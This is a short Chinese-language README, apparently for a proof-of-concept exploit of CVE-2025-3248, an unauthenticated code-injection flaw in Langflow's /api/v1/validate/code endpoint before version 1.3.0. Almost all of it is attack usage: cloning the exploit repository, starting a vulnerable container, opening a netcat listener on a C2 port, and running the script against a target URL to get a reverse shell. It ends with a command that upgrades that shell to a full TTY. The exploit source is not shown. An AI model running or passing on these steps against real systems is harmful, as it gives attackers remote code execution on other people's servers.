
用于在 Langflow 版本 <1.3.0 中实现 RCE 的 PoC
Langflow 1.3.0 之前的版本在 /api/v1/validate/code 端点中通过 Python exec() 函数存在未经验证的代码注入漏洞。 此漏洞利用程序通过该漏洞建立反向 shell 连接。
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4
# 终端 1
nc -nvlp <C2_PORT>
# 终端 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>
例如:python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337
注意:为了将 shell 升级为 TTY,请在获得 shell 后执行以下命令。
python -c 'import pty; pty.spawn("/bin/bash")'
